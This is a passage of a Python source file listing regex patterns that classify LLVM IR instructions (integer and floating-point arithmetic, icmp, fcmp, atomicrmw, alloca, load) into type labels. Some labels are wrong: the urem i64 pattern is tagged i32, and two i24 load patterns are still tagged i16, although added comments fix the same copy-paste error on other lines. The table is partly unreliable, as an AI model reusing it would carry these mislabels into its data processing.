['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = sdiv ' + any_of(opt_usdiv) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID> .*', 'struct operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\* .*', 'struct* operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\*\* .*', 'struct** operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\*\*\* .*', 'struct*** operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i1 .*', 'i1 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i2 .*', 'i2 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i4 .*', 'i4 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i8 .*', 'i8 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i16 .*', 'i16 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i24 .*', 'i24 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i24> .*', '<d x i24> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i32 .*', 'i32 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i40 .*', 'i40 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i40> .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i64 .*', 'i64 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i128 .*', 'i128 operation', 'int operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i40\* .*', 'i40* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?float\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?double\* .*', 'double* operation', 'floating point* operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i1\*\* .*', 'i1** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i2\*\* .*', 'i2** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i4\*\* .*', 'i4** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i8\*\* .*', 'i8** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i16\*\* .*', 'i16** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i32\*\* .*', 'i32** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i40\*\* .*', 'i40** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i64\*\* .*', 'i64** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?i128\*\* .*', 'i128** operation', 'int** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?x86_fp80\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?float\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?double\*\* .*', 'double** operation', 'floating point** operation'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<%ID>\* .*', 'struct/class op', 'struct/class op'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?(%"|opaque).*', 'struct/class op', 'struct/class op'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = icmp ' + any_of(opt_icmp) + '?void \(.*', 'function op', 'struct/class op'],
['<%ID> = srem i1 .*', 'i1 operation', 'int operation'],
['<%ID> = srem <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = srem i2 .*', 'i2 operation', 'int operation'],
['<%ID> = srem <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = srem i4 .*', 'i4 operation', 'int operation'],
['<%ID> = srem <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = srem i8 .*', 'i8 operation', 'int operation'],
['<%ID> = srem <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = srem i16 .*', 'i16 operation', 'int operation'],
['<%ID> = srem <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = srem i32 .*', 'i32 operation', 'int operation'],
['<%ID> = srem <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = srem i64 .*', 'i64 operation', 'int operation'],
['<%ID> = srem <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = srem i128 .*', 'i128 operation', 'int operation'],
['<%ID> = srem <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = urem i1 .*', 'i1 operation', 'int operation'],
['<%ID> = urem <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = urem i2 .*', 'i2 operation', 'int operation'],
['<%ID> = urem <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = urem i4 .*', 'i4 operation', 'int operation'],
['<%ID> = urem <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = urem i8 .*', 'i8 operation', 'int operation'],
['<%ID> = urem <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = urem i16 .*', 'i16 operation', 'int operation'],
['<%ID> = urem <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = urem i32 .*', 'i32 operation', 'int operation'],
['<%ID> = urem <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = urem i64 .*', 'i32 operation', 'int operation'],
['<%ID> = urem <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = urem i128 .*', 'i128 operation', 'int operation'],
['<%ID> = urem <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fadd ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fsub ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fmul ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fdiv ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = frem ' + any_of(fast_math_flag) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?x86_fp80.*', 'float operation', 'floating point operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?<\d+ x x86_fp80>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?float.*', 'float operation', 'floating point operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?<\d+ x float>.*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?double.*', 'double operation', 'floating point operation'],
['<%ID> = fcmp (fast |)?' + any_of(opt_fcmp) + '?<\d+ x double>.*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = atomicrmw add i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw add i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw add i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw add i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw add i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw add i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw add i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw add i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = atomicrmw sub i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw sub i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw sub i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw sub i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw sub i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw sub i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw sub i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw sub i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = atomicrmw or i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw or i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw or i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw or i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw or i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw or i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw or i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw or i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = atomicrmw xchg i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = alloca i1($|,).*', 'i1 operation', 'int operation'],
['<%ID> = alloca i2($|,).*', 'i2 operation', 'int operation'],
['<%ID> = alloca i4($|,).*', 'i4 operation', 'int operation'],
['<%ID> = alloca i8($|,).*', 'i8 operation', 'int operation'],
['<%ID> = alloca i16($|,).*', 'i16 operation', 'int operation'],
['<%ID> = alloca i32($|,).*', 'i32 operation', 'int operation'],
['<%ID> = alloca i64($|,).*', 'i64 operation', 'int operation'],
['<%ID> = alloca i128($|,).*', 'i128 operation', 'int operation'],
['<%ID> = alloca i1\*($|,).*', 'i1* operation', 'int* operation'],
['<%ID> = alloca i2\*($|,).*', 'i2* operation', 'int* operation'],
['<%ID> = alloca i4\*($|,).*', 'i4* operation', 'int* operation'],
['<%ID> = alloca i8\*($|,).*', 'i8* operation', 'int* operation'],
['<%ID> = alloca i16\*($|,).*', 'i16* operation', 'int* operation'],
['<%ID> = alloca i32\*($|,).*', 'i32* operation', 'int* operation'],
['<%ID> = alloca i64\*($|,).*', 'i64* operation', 'int* operation'],
['<%ID> = alloca i128\*($|,).*', 'i128* operation', 'int* operation'],
['<%ID> = alloca x86_fp80($|,).*', 'float operation', 'floating point operation'],
['<%ID> = alloca float($|,).*', 'float operation', 'floating point operation'],
['<%ID> = alloca double($|,).*', 'double operation', 'floating point operation'],
['<%ID> = alloca x86_fp80\*($|,).*', 'float* operation', 'floating point* operation'],
['<%ID> = alloca float\*($|,).*', 'float* operation', 'floating point* operation'],
['<%ID> = alloca double\*($|,).*', 'double* operation', 'floating point* operation'],
['<%ID> = alloca %".*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca <%.*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca <?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = alloca <\d+ x i1>, .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i2>, .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i4>, .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i8>, .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i16>, .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i32>, .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i64>, .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x i128>, .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = alloca <\d+ x x86_fp80>, .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = alloca <\d+ x float>, .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = alloca <\d+ x double>, .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = alloca <\d+ x \{ .* \}>, .*', '<d x structure> operation', '<d x structure> operation'],
['<%ID> = alloca <\d+ x i1>\*, .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i2>\*, .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i4>\*, .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i8>\*, .*', '<d x i8>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i16>\*, .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i32>\*, .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i64>\*, .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x i128>\*, .*', '<d x i128>* operation', '<d x int>* operation'],
['<%ID> = alloca <\d+ x x86_fp80>\*, .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = alloca <\d+ x float>\*, .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = alloca <\d+ x double>\*, .*', '<d x double>* operation', '<d x floating point>* operation'],
['<%ID> = alloca <\d+ x \{ .* \}>\*, .*', '<d x structure>* operation', '<d x structure>* operation'],
['<%ID> = alloca \[\d+ x i1\], .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i2\], .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i4\], .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i8\], .*', '[d x i8] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i16\], .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i32\], .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i64\], .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x i128\], .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = alloca \[\d+ x x86_fp80\], .*', '[d x float] operation', '[d x floating point] operation'],
['<%ID> = alloca \[\d+ x float\], .*', '[d x float] operation', '[d x floating point] operation'],
['<%ID> = alloca \[\d+ x double\], .*', '[d x double] operation', '[d x floating point] operation'],
['<%ID> = alloca \[\d+ x \{ .* \}\], .*', '[d x structure] operation', '[d x structure] operation'],
['<%ID> = alloca { { float, float } }, .*', '{ float, float } operation', 'complex operation'],
['<%ID> = alloca { { double, double } }, .*', '{ double, double } operation', 'complex operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1, .*', 'i1 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2, .*', 'i2 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4, .*', 'i4 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8, .*', 'i8 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16, .*', 'i16 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i24, .*', 'i16 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32, .*', 'i32 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40, .*', 'i40 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64, .*', 'i64 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128, .*', 'i128 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256, .*', 'i256 operation', 'int operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1\*, .*', 'i1* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2\*, .*', 'i2* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4\*, .*', 'i4* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8\*, .*', 'i8* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16\*, .*', 'i16* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i24\*, .*', 'i16* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32\*, .*', 'i32* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40\*, .*', 'i40* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64\*, .*', 'i64* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128\*, .*', 'i128* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256\*, .*', 'i256* operation', 'int* operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1\*\*, .*', 'i1** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2\*\*, .*', 'i2** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4\*\*, .*', 'i4** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8\*\*, .*', 'i8** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16\*\*, .*', 'i16** operation', 'int** operation'],
# Fix copy-paste tag: i24** loads were labeled 'i16** operation'.
['<%ID> = load ' + any_of(opt_load) + '?i24\*\*, .*', 'i24** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32\*\*, .*', 'i32** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40\*\*, .*', 'i40** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64\*\*, .*', 'i64** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128\*\*, .*', 'i128** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256\*\*, .*', 'i256** operation', 'int** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i1\*\*\*, .*', 'i1*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i2\*\*\*, .*', 'i2*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i4\*\*\*, .*', 'i4*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i8\*\*\*, .*', 'i8*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i16\*\*\*, .*', 'i16*** operation', 'int*** operation'],
# Fix copy-paste tag: i24*** loads were labeled 'i16*** operation'.
['<%ID> = load ' + any_of(opt_load) + '?i24\*\*\*, .*', 'i24*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i32\*\*\*, .*', 'i32*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i40\*\*\*, .*', 'i40*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i64\*\*\*, .*', 'i64*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i128\*\*\*, .*', 'i128*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?i256\*\*\*, .*', 'i256*** operation', 'int*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80, .*', 'float operation', 'floating point operation'],
['<%ID> = load ' + any_of(opt_load) + '?float, .*', 'float operation', 'floating point operation'],
['<%ID> = load ' + any_of(opt_load) + '?double, .*', 'double operation', 'floating point operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = load ' + any_of(opt_load) + '?float\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = load ' + any_of(opt_load) + '?double\*, .*', 'double* operation', 'floating point* operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80\*\*, .*', 'float** operation', 'floating point** operation'],
['<%ID> = load ' + any_of(opt_load) + '?float\*\*, .*', 'float** operation', 'floating point** operation'],
['<%ID> = load ' + any_of(opt_load) + '?double\*\*, .*', 'double** operation', 'floating point** operation'],
['<%ID> = load ' + any_of(opt_load) + '?x86_fp80\*\*\*, .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?float\*\*\*, .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?double\*\*\*, .*', 'double*** operation', 'floating point*** operation'],
['<%ID> = load ' + any_of(opt_load) + '?%".*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?<%.*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i1>, .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i2>, .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i4>, .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i8>, .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i16>, .*', '<d x i16> operation', '<d x int> operation'],
# Fix copy-paste tag: <d x i24> loads were labeled '<d x i16> operation'.
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i24>, .*', '<d x i24> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i32>, .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i40>, .*', '<d x i40> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i64>, .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i128>, .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double>, .*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x \{ .* \}>, .*', '<d x structure> operation',
'<d x structure> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i1\*>, .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i2\*>, .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i4\*>, .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i8\*>, .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i16\*>, .*', '<d x i16*> operation', '<d x int*> operation'],
# Fix copy-paste tag: <d x i24*> loads were labeled '<d x i16*> operation'.
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i24\*>, .*', '<d x i24*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i32\*>, .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i40\*>, .*', '<d x i40*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i64\*>, .*', '<d x i64*> operation', '<d x int*> operation'],
